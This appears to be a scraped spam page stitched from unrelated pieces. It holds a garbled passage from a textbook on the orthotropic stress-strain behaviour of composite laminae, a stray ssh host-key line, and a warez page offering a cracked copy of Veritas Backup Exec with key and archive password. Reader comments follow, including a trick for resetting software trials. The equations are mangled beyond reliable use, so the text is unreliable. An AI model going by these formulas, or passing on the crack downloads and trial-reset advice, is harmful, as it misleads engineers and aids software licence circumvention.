2.10 The lamina. Marine Composite Materials and Structure 31 2.4.1 Orthotropic Properties A unidirectional layer is shown below in Figure 2.11, along with the coordinate system used to establish notation. Here directions 1 and 2 refer to the fiber direction and transverse to the fibers in the plane of the ply, and direction 3 refers to the throughthe-thickness direction. The modulus of the ply in the direction of the fibers is denoted by E11, and the modulus of the ply in the transverse direction is denoted by E22. The transverse to a uniaxial stress in the fiber direction is a strain given by ε1 &frac14; s1 E11 (2.1) The response to a uniaxial stress in (transverse) direction 2 is a strain given by ε2 &frac14; s2 E22 (2.2) It should be noted that the numbers 1 and 2 indicate directions and have nothing to do with the principal stresses. Similarly, in-plane shear modules G12 can be defined so that the response to a shear stress is a shear strain given by g12 &frac14; s12 G12 Figure 2.11 A unidirectional layer. (2.3) 32 Chapter 2 The Poisson ratio can also be defined in the same way. Considering a uniaxial stress in (fiber) directional, a strain in (transverse) direction 2 will occur due to the Poisson effect. The appropriate Poisson ratio can be defined as (for uniaxial stress in direction 1) ε2 &frac14; v12 ε1 (2.4) Conversely, if a uniaxial stress is applied in (transverse) direction 2, the strain in (fiber) direction 1 can be defined in terms of the appropriate Poisson ratio as (for uniaxial stress in direction 2) ε1 &frac14; v21 ε2 (2.5) The stress and strain in the through-the-thickness direction can be defined in a similar manner. s3 E33 ε1 &frac14; v31 ε3 ε3 &frac14; (2.6) (2.7) For uniaxial stress in direction 2, ε2 &frac14; v32 ε3 (2.8) Finally, these straightforward notions can be combined using the idea of superposition. The strain in direction 1 results both from a stress s1 through the Poisson effect and from stresses s2 and s3. Thus, stresses s1 and s2 and s3 are then applied. A strain in direction 1 results from each of these stresses, and is the sum of the strains that would result from these stresses applied separately. The strains in direction 1, for each load acting separately, are as follows. s1 loading: ε1 &frac14; s1 E11 (2.9) s2 loading: ε1 &frac14; v21 ε2 &frac14; v21 s2 E22 (2.10) ε1 &frac14; v31 ε3 &frac14; v31 s3 E33 (2.11) s3 loading: Marine Composite Materials and Structure 33 Combining these loadings and adding the strains in direction 1 by superposition the following is obtained. s1 v21 s2 v31 s3 ε1 &frac14; E11 E22 E33 (2.12) Similarly, ε2 &frac14; v12 s1 s2 v32 s3 &thorn; E11 E22 E33 It is convenient to arrange these in a matrix. Using the standard procedures, the following matrix can be obtained. 2 v21 v31 6 1 0 0 6 E22 E33 6 E11 6 6 1 v32 0 1 6 v12 0 0 6 E ε1 E22 E33 11 6 B ε C 6 B 2 C 6 v13 v23 1 B C 6 0 0 B ε3 C 6 E E33 E22 11 B C 6 Bg C&frac14;6 B 23 C 6 1 B C 6 0 0 0 Bg C 6 0 G23 @ 31 A 6 6 6 1 g12 6 0 0 0 0 6 G31 6 6 6 4 0 0 0 0 0 (2.13) matrix notation and 3 0 7 7 7 7 7 0 0 7 7 7 7 B 7 B B 0 7 7 B 7 B 7$B 7 B B 0 7 7 B 7 @ 7 7 0 7 7 7 7 1 7 5 G12 s1 1 s2 C C C s3 C C s23 C C C s31 C A (2.14) s12 or fεg &frac14; fSg$fsg (2.15) The S matrix is often referred to as the compliance matrix for the lamina, or the strainestress form of material properties with the strains being the dependent variables. It can be shown that the matrices describing the stressestrain relationships of an elastic material must be symmetric. The relationship can be given as E11 v21 &frac14; E22 v12 (2.16) v12 v21 &frac14; E11 E22 (2.17) The off-diagonal terms are held off so that only nine material properties are required in order to fully characterize the linear behavior of a lamina in 3-D stress and strain 34 Chapter 2 states. The zeros in the compliance matrix reflect the fact that the stressestrain behavior of an orthotropic material is being described (rather than a generally anisotropic material), and that the description is made with respect to the principal material axes. 2.4.2 Orthotropic Properties in Plane Stress Because many engineering structures made of laminates are thin in the thickness direction, the following two-dimensional subset is frequently used. This can be obtained by setting s3 &frac14; s13 &frac14; s23 &frac14; 0 (a plane-stress assumption). 0 1 1 v21 0 C 0 1 B 1 E22 B E11 C0 ε1 B C s1 CB 1 B C B v12 C (2.18) 0 C @ s2 A @ ε2 A &frac14; B B E11 C E 22 B C g12 B C s12 @ 1 A 0 0 G12 The matrix of Eqn (2.18) can be inverted to obtain the stressestrain stiffness matrix below. 0 1 0 10 1 s1 Q11 Q12 ε1 0 B C B CB C (2.19) 0 [email protected]
Источник: https://studylib.es/doc/9088359/marine-structural-design--second-edition-by-bai--yong-jin...
ssh-hostkey: 1024 cc:83:ec:46:f6:6a:bf:5c:e0:3b:d7:93:9b:db:40:4c (DSA)

Network.hacking Professionelle.angriffs .Und.verteidigungstechniken.gegen.hacker.und.Datendiebe.edition.2

April 21, 2018

You can Download Veritas Backup Exec Crack from our website for free

Veritas Backup Exec

Overview Table of Article

Veritas Backup Exec review

Veritas Backup Exec – I’ve been dreaming of introducing you to this program for a long time, probably it’s time! So, in front of you is a high-performance solution with client-server architecture that can create backups and restore data for servers, workstations and applications with maximum quality, accuracy and speed. You will be able to send backups, restore data, configure the storage, monitor tasks. The Administration Console is easy to run from the BackupExec server, you can also work with a remote computer. Among the advantages are convenient backup scheduling, full system recovery, comprehensive monitoring and visual mechanisms for performing daily tasks.

Click on the link below to download Veritas Backup Exec as always for free, the output will get an ISO image, mount, install and use, of course in the archive you will also find a key and a crack to register, all standard.

Backup Exec key Features:

  • protect your virtual and physical environment with a single solution;
  • simplifying backup, reducing cost and complexity with products designed for multiple endpoints;
  • quickly create instant replicas of virtual machines by tightly integrating with technologies such as Microsoft® Volume Shadow Copy Service (VSS) and VMware vStorage API for Data Protection (VADP) to reduce CPU, memory and I/O consumption on the virtual host;
  • backup on disks, tapes and in the cloud.

Also recommended to you Download CyberLink PowerDVD Ultra

Screenshots:

Password for archiv: kolompc.com

License: ShareWare

Download Veritas Backup Exec 21.3.1200.2255 – (3.2 Gb)

UsersDrive upload-4ever UploadEv

Источник: https://kolompc.com/veritas-backup-exec/

Notice: Undefined variable: z_bot in /sites/travelafter.us/crack-key-for/veritas-backup-exec-203-crack-crack-key-for-u.php on line 119

Notice: Undefined variable: z_empty in /sites/travelafter.us/crack-key-for/veritas-backup-exec-203-crack-crack-key-for-u.php on line 119

Posted inCrack Key For

5 thoughts on “Veritas backup exec 20.3 crack - Crack Key For U”

  • Collective Intelligence says:

    I’d lowkey do that 😳😳

  • Zaheer Ansari says:

    All Asus BW-16D1HT can be use to rip 4k or does the firm ware has to be a specific one?

  • Keemo Reacts says:

    Market Observer can you email me.. i have a few questions regarding something close to what this fella is asking whiskeybentvalley@gmail.com

  • Ervin Vas says:

    NORTON ругается , сайт с вирусом, есть другие ссылки на дрова.ispusb

  • Sunny Raj says:

    the simply way very simple is this: CREATE A SYSTEM RESTORE POINT BEFORE YOU INSTALL THE SOFTWARE YOU WANT....AND WHENM THE PERIOD TRIAL IS FINISH...JUST MAKE SYSTEM RESTORE....BUUUUMMM....YOU CAN INSTALL THE SOFTWARE AGAIN....AND AGAIN...

Leave a Reply

Your email address will not be published. Required fields are marked *